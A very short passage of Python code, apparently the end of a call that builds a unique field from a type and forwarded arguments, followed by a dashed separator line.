self.type, unique=True, *self.args, **self.kwargs) --------------------------------------------------------------------------------